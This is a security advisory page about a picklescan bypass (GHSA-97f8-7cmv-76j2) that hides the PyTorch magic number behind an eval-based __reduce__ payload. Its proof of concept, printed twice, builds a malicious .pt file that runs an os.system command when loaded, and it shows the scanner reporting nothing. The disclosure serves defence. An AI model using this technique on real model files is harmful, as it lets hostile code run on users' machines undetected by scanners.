Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
7.1
PyTorch Bypasses Picklescan's Magic Number Check
GHSA-97f8-7cmv-76j2
Summary
A vulnerability in PyTorch allows an attacker to bypass a security check in Picklescan, a tool used to detect malicious pickled files. This could potentially allow an attacker to hide malicious code in a PyTorch file, which could lead to security issues if Picklescan is used to scan these files. To protect against this, ensure that Picklescan and PyTorch are updated to the latest versions.
What to do
- Update picklescan to version 1.0.3.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | picklescan | <= 1.0.3 | 1.0.3 |
Original title
Picklescan (scan_pytorch) Bypass via dynamic eval MAGIC_NUMBER
Original description
### Summary
This is a scanning bypass to `scan_pytorch` function in `picklescan`. As we can see in the implementation of [get_magic_number()](https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/torch.py#L76C5-L84) that uses `pickletools.genops(data)` to get the `magic_number` with the condition `opcode.name` includes `INT` or `LONG`, but the PyTorch's implemtation simply uses [pickle_module.load()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1797) to get this `magic_number`. For this implementation difference, we then can embed the `magic_code` into the `PyTorch` file via dynamic `eval` on the `\_\_reduce\_\_` trick, which can make the `pickletools.genops(data)` cannot get the `magic_code` in `INT` or `LONG` type, but the `pickle_module.load()` can still return the same `magic_code`, eading to a bypass.
### PoC
#### Attack Step 1
we can edit the source code of the function [\_legacy\_save()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1120) as follows:
```Python
class payload:
def __reduce__(self):
return (eval, ('MAGIC_NUMBER',))
pickle_module.dump(payload(), f, protocol=pickle_protocol)
```
#### Attack Step 2
with the modified version of `PyTorch`, we run the following PoC to generate the `payload.pt`:
```Python
import torch
class payload:
def __reduce__(self):
return (__import__('os').system, ('touch /tmp/hacked',))
torch.save(payload(), './payload.pt', _use_new_zipfile_serialization = False)
```
#### Picklescan result
```
ERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356
----------- SCAN SUMMARY -----------
Scanned files: 0
Infected files: 0
Dangerous globals: 0
```
#### Victim Step
```Python
import torch
torch.load('./payload.pt', weights_only=False)
```
then you can find the illegal file `/tmp/hacked` created in your local system.
### Impact
Craft malicious `PyTorch` payloads to bypass `picklescan`, then recall ACE/RCE.
This is a scanning bypass to `scan_pytorch` function in `picklescan`. As we can see in the implementation of [get_magic_number()](https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/torch.py#L76C5-L84) that uses `pickletools.genops(data)` to get the `magic_number` with the condition `opcode.name` includes `INT` or `LONG`, but the PyTorch's implemtation simply uses [pickle_module.load()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1797) to get this `magic_number`. For this implementation difference, we then can embed the `magic_code` into the `PyTorch` file via dynamic `eval` on the `\_\_reduce\_\_` trick, which can make the `pickletools.genops(data)` cannot get the `magic_code` in `INT` or `LONG` type, but the `pickle_module.load()` can still return the same `magic_code`, eading to a bypass.
### PoC
#### Attack Step 1
we can edit the source code of the function [\_legacy\_save()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1120) as follows:
```Python
class payload:
def __reduce__(self):
return (eval, ('MAGIC_NUMBER',))
pickle_module.dump(payload(), f, protocol=pickle_protocol)
```
#### Attack Step 2
with the modified version of `PyTorch`, we run the following PoC to generate the `payload.pt`:
```Python
import torch
class payload:
def __reduce__(self):
return (__import__('os').system, ('touch /tmp/hacked',))
torch.save(payload(), './payload.pt', _use_new_zipfile_serialization = False)
```
#### Picklescan result
```
ERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356
----------- SCAN SUMMARY -----------
Scanned files: 0
Infected files: 0
Dangerous globals: 0
```
#### Victim Step
```Python
import torch
torch.load('./payload.pt', weights_only=False)
```
then you can find the illegal file `/tmp/hacked` created in your local system.
### Impact
Craft malicious `PyTorch` payloads to bypass `picklescan`, then recall ACE/RCE.
ghsa CVSS4.0
7.1
Vulnerability type
CWE-184
Published: 18 Feb 2026 · Updated: 7 Mar 2026 · First seen: 6 Mar 2026